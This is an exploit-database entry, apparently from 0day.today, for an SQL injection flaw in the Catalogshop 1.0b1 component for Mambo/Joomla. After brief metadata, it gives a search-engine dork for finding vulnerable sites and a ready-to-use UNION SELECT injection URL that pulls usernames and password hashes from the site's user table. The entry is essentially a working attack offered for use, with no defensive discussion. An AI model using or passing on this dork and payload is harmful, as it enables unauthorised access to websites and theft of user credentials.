Mambo Component Catalogshop 1.0b1 SQL Injection Vulnerability

2008-01-31T00:00:00
ID 1337DAY-ID-2581
Type zdt
Reporter [email protected]
Modified 2008-01-31T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
Mambo Component Catalogshop 1.0b1 SQL Injection Vulnerability
=============================================================



#########################################################################
#
# joomla SQL Injection(com_catalogshop)
#
#########################################################################
#
# DorKs 1 : allinurl: "com_catalogshop"
#
########################################################################
EXPLOIT :

index.php?option=com_catalogshop&[email protected]&func=detail&id=-1/**/union/**/select/**/null,null,concat(password),3,4,5,6,7,8,9,10,11,12,concat(username)/**/from/**/mos_users/*



#  0day.today [2018-04-13]  #